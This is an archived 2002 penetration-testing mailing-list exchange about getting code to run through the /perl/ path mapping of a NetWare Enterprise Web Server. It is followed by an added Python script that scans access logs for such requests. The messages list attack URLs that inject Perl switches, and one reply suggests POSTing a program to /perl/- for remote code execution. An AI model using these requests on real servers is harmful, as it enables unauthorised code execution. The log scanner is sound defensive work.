RE: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --Assistance requested.

From: Dawes, Rogan (ZA - Johannesburg) (rdawesat_private)
Date: Wed Dec 18 2002 - 23:32:34 PST


    I remember finding this on a netware server that I was auditing.
    Essentially, it is a path mapping that executes the rest of the line as a
    perl filename.
    
    E.g. /perl/mycgi.pl actually executes "perl -- ${root}/mycgi.pl".
    And /perl/dir/mycgi.pl executes "perl -- ${root}/dir/mycgi.pl"
    
    I'm guessing about the "--", but that is what I'd do. It would also explain
    why the rest of your options "-h", etc failed.
    
    One thing you could try, which I've just noticed in the perlrun manpage:
    
    Try POSTing your program to the following URL
    /perl/-
    
    Might be equivalent to:
    
    0 $ echo 'print "hello world\n";' | perl -- -
    hello world
    0 $ 
    
    You would obviously have to think about encoding your program to pass HTTP
    %-encoding rules, and substitute spaces with +, etc. There were some nice
    suggestions on this list a while back as to how to write a perl program
    without any spaces in it - I've not got time to search for it though :-)
    
    Good luck. Let us know if it works.
    
    Rogan
    
    P.S. One thing you may want to do is print a blank line before any other
    output. Otherwise you may be writing headers, rather than body.
    
    -----Original Message-----
    From: Ralph Los [mailto:RLosat_private] 
    Sent: 18 December 2002 10:29 PM
    To: Pen-testat_private
    Subject: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --Assistance requested.
    Sensitivity: Confidential
    
    
    Hey - let me re-open a thread again, if you folks don't mind.  I've found a
    server at one of our pen-test clients with this NetWare HTTP/HTTPS server.
    I've been trying to figure out a way to make it tango, but have been having
    some problems.  Here's what I've tried and where I left off, maybe someone
    can toss some suggestions out.
    
    Attempt:  http://address/perl/-v
    Result: 	NetWare port Copyright 1998 Novell Corporation.
    		All rights reserved.
    
    Attempt: http://address/perl/-h
    Result:	Page not found
    
    Attempt: http://address/perl/-e%20print%20%22hello%20world%22;
    Result: IE just hangs there "DONE"
    
    Attempt: http://address/perl/-e%20print%201;
    Result: IE just hangs there "DONE"
    
    So what's up?  Is this box "patched" against this form of attack somehow?
    Could someone throw me another idea maybe?
    
    Thanks a bunch.
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
    
    



    This archive was generated by hypermail 2b30 : Thu Dec 19 2002 - 19:26:08 PST
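
For defenders reviewing a server with the kind of /perl/ path mapping discussed in this thread, the following added example (not part of the original messages) scans access-log lines for requests whose mapped filename would reach the interpreter starting with "-". It assumes Common Log Format and a "/perl/" prefix; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

PERL_PREFIX = "/perl/"  # mapping named in the thread; adjust to the server's configuration

# Constructed sample access-log lines (Common Log Format), not taken from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Dec/2002:10:01:00 +0000] "GET /perl/mycgi.pl HTTP/1.0" 200 512
192.0.2.77 - - [18/Dec/2002:10:02:11 +0000] "GET /perl/-v HTTP/1.0" 200 96
192.0.2.77 - - [18/Dec/2002:10:02:40 +0000] "GET /perl/-e%20print%201; HTTP/1.0" 200 0
192.0.2.77 - - [18/Dec/2002:10:03:05 +0000] "POST /perl/- HTTP/1.0" 200 12
192.0.2.10 - - [18/Dec/2002:10:04:00 +0000] "GET /perl/dir/my-cgi.pl?x=-1 HTTP/1.0" 200 300
192.0.2.10 - - [18/Dec/2002:10:05:00 +0000] "GET /docs/-readme.html HTTP/1.0" 200 300
"""

# client, method, request target, status
REQUEST_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) [^"]*" (\d{3}) ')


def suspicious_argument(target):
    """Return the decoded mapped argument if it starts with '-', else None."""
    path = target.split("?", 1)[0]   # the query string is not part of the mapped filename
    decoded = unquote_plus(path)     # treat both %20 and + as spaces, as the thread describes
    if not decoded.startswith(PERL_PREFIX):
        return None
    arg = decoded[len(PERL_PREFIX):]
    # A leading "-" would be read as an interpreter switch, or as stdin for a bare "-".
    return arg if arg.lstrip().startswith("-") else None


def scan(log_text):
    """Return (client, method, decoded_argument, status) for each flagged request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        client, method, target, status = m.groups()
        arg = suspicious_argument(target)
        if arg is not None:
            findings.append((client, method, arg, int(status)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hyphen inside a filename or in the query string is not flagged; only the start of the mapped argument matters, because that is the part that becomes the interpreter's first argument.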